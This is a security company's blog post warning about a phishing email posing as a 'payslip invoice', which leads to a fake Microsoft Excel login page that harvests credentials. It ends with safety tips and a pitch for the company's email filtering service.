Akankasha Dewan 19 October 2020 18:03:36 AEDT 3 MIN READ

Email uses link to "payslip invoice" to deliver phishing attack

Invoices can be very costly indeed – and not always in the traditional sense. A recent phishing invoice email scam detected by MailGuard is designed to trick victims into revealing their confidential data.

Titled “PAYSLIP INVOICE OCTOBER – 2020”, the email looks like a pretty standard office email, and tells recipients to urgently view an “attached secured timesheet and invoice for october” in order to proceed with payment. A link to view the invoice is included, presented as a Microsoft Excel attachment, and the email ends with a signature belonging to a representative from a European company, complete with contact details & office address. It actually originates from an unrelated email address with a fairly new domain name.

Here’s what the email looks like:




Unsuspecting recipients who click on the link are led to a silent redirect page hosted on a compromised site for a different European company, before being presented with a Microsoft Excel-branded login page with its background blurred, as per the below:



This is a phishing page hosted on Google Cloud, and uses JavaScript’s unescape function to obscure the HTML of the page. It is included most likely an attempt to thwart automated link checking.

Once users “login” by inserting their email address and password, the attacker harvests them for later use, and the user is met with an error saying that the credentials are invalid.

As you can see from the screenshots above, cybercriminals have employed multiple elements to trick recipients. For example, this email attempts to intrigue recipients by telling them a new document i.e. “a payslip invoice” has arrived. In addition, it asks recipients to go though the document “urgently”. This motivates the recipient to click on the provided link right away, distracting them from checking the sending address of the email and looking out for any other errors. The inclusion of the word “Outlook Docs” in the display name also suggests the email is sent from a credible source using a reputable Microsoft service – boosting its legitimacy.

This invoice-related phishing scam is a good reminder of how innocent-looking emails can, in fact, be malicious. As simple as they may seem, these attacks are happening all too regularly, and with devastating effect. Not only can they gain access to confidential data of individual employees and firms, they can, ultimately, inflict significant financial and reputational damage on an organisation.

In such cases, users are reminded of the importance of not accepting/clicking on documents from unknown senders, despite the organisation they purport to be from. All attachments/links should only be accessed when users are certain about the credibility of their owners.

As a precaution, MailGuard urges you not to click links within emails that:

  • Are not addressed to you by name.
  • Appear to be from a legitimate company but use poor English, or omit personal details that a legitimate sender would include.
  • Are from businesses that you were not expecting to hear from.
  • Take you to a landing page or website that is not the legitimate URL of the company the email is purporting to be sent from. 

One email is all that it takes

All that it takes to break into your business is a cleverly-worded email message. If scammers can trick one person in your company into clicking on a malicious link they can gain access to your data.

For a few dollars per staff member per month, you can protect your business with MailGuard's predictive and advanced email security.

Talk to a solution consultant at MailGuard today about securing your company's network.

Why not stay up-to-date with MailGuard's latest blog posts by subscribing to free updates? Subscribe to weekly updates by clicking on the button below.

Keep Informed with Weekly Updates